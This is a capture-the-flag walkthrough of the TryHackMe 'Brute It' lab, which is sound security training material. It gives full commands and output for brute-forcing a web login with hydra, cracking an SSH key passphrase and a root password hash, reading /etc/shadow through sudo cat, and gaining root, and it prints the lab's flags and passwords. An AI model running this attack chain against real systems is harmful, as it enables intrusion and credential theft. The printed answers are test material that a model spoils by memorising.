Brute It

Brute ItTryHackMe

Task 1: About this box

Deploy the machine

No answer needed

Task 2: Reconnaissance

Search for open ports using nmap. How many ports are open?

• Let's perform a nmap scan against the machine.

$ nmap -sC -sV 10.10.30.186
Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-07 08:43 IST
Nmap scan report for 10.10.30.186
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:0e:bf:14:fa:54:b3:5c:44:15:ed:b2:5d:a0:ac:8f (RSA)
|   256 d0:3a:81:55:13:5e:87:0c:e8:52:1e:cf:44:e0:3a:54 (ECDSA)
|_  256 da:ce:79:e0:45:eb:17:25:ef:62:ac:98:f0:cf:bb:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.11 seconds

• There are two open ports:

Port	Service
22	ssh
80	http

Answer

2

What version of SSH is running?

• The answer is present in the nmap scan.

Answer

OpenSSH 7.6p1

What version of Apache is running?

• The answer is in the nmap scan.

Answer

2.4.29

Which Linux distribution is running?

• The answer is in the nmap scan.

Answer

Ubuntu

Search for hidden directories on web server. What is the hidden directory?

• Let's brute force the web pages using gobuster.

$ gobuster dir -u http://10.10.30.186 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.30.186
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.10.30.186/admin/]
/index.html           (Status: 200) [Size: 10918]
/server-status        (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
=============================================================== 

Answer

/admin

Task 2: Getting a shell

What is the user:password of the admin panel?

• Let's go to the admin/ directory.

• We can check the source code using CTRL+U.

• Now that we know the username, we can use hydra to brute force the password.

$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.30.186 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-07 09:48:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.30.186:80/admin/index.php:user=^USER^&pass=^PASS^:F=username or password invalid
[80][http-post-form] host: 10.10.30.186   login: admin   password: xavier
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-07 09:49:25

Answer

admin:xavier

Crack the RSA key you found. What is John's RSA Private Key passphrase?>

• Let's login with admin as the username and xavier as the password.

• Let's download the RSA private key for the user john.

$ wget http://10.10.30.186/admin/panel/id_rsa
--2023-12-07 09:59:03--  http://10.10.30.186/admin/panel/id_rsa
Connecting to 10.10.30.186:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1766 (1.7K)
Saving to: ‘id_rsa’

id_rsa                                                     100%[========================================================================================================================================>]   1.72K  --.-KB/s    in 0s      

2023-12-07 09:59:04 (3.21 No error) - ‘id_rsa’ saved [1766/1766]

• We can use ssh2john to create a hash file.

$ ssh2john id_rsa > id_hash 

• Now we can use john to crack the hashes.

$ john id_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
rockinroll       (id_rsa)     
1g 0:00:00:00 DONE (2023-12-07 10:04) 4.000g/s 290496p/s 290496c/s 290496C/s romeo23..renatito
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Answer

rockinroll

user.txt

• Let's change the permissions of the id_rsa file.

$ chmod 700 id_rsa 

• Now that we know that the password for john is rockinroll, let's login through SSH.

$ ssh -i id_rsa john@10.10.30.186
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Dec  7 04:40:36 UTC 2023

  System load:  0.0                Processes:           102
  Usage of /:   25.7% of 19.56GB   Users logged in:     0
  Memory usage: 36%                IP address for eth0: 10.10.30.186
  Swap usage:   0%


63 packages can be updated.
0 updates are security updates.


Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ 

• Let's read the user.txt file.

john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt 
THM{a_password_is_not_a_barrier}

Answer

THM{a_password_is_not_a_barrier}

Web flag

• The web flag was present on the page with the RSA private key.

THM{brut3_f0rce_is_e4sy}

Task 4: Privilege Escalation

Find a form to escalate your privileges. What is the root's password?

• Let's check what sudo commands john has the permission to execute.

john@bruteit:~$ sudo -l
Matching Defaults entries for john on bruteit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on bruteit:
    (root) NOPASSWD: /bin/cat

• So we can run /bin/cat as an elevated user.

• That means we can cat the /etc/shadow file.

john@bruteit:~$ sudo /bin/cat /etc/shadow
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
thm:$6$hAlc6HXuBJHNjKzc$NPo/0/iuwh3.86PgaO97jTJJ/hmb0nPj8S/V6lZDsjUeszxFVZvuHsfcirm4zZ11IUqcoB9IEWYiCV.wcuzIZ.:18489:0:99999:7:::
sshd:*:18489:0:99999:7:::
john:$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0:18490:0:99999:7:::

• We can tell that the root user's password is hashed using SHA-512 by the $6$ characters.

• Let's save the root user's hash on our machine.

$ echo $6$zdk0jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6MJYPUTAaWu4infDjI88U9yUXEVgL > root_hash

• We have to find the correct mode for SHA-512.

• Let's run hashcat in order to crack this hash.

$ hashcat -a 0 -m 1800 root_hash.txt /usr/share/wordlists/rockyou.txt

Answer

football

root.txt

• Let's switch to the root user.

john@bruteit:~$ su root
Password: 
root@bruteit:/home/john# 

• We can now read the root.txt file.

root@bruteit:/home/john# cd /root
root@bruteit:~# cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}

Answer

THM{pr1v1l3g3_3sc4l4t10n}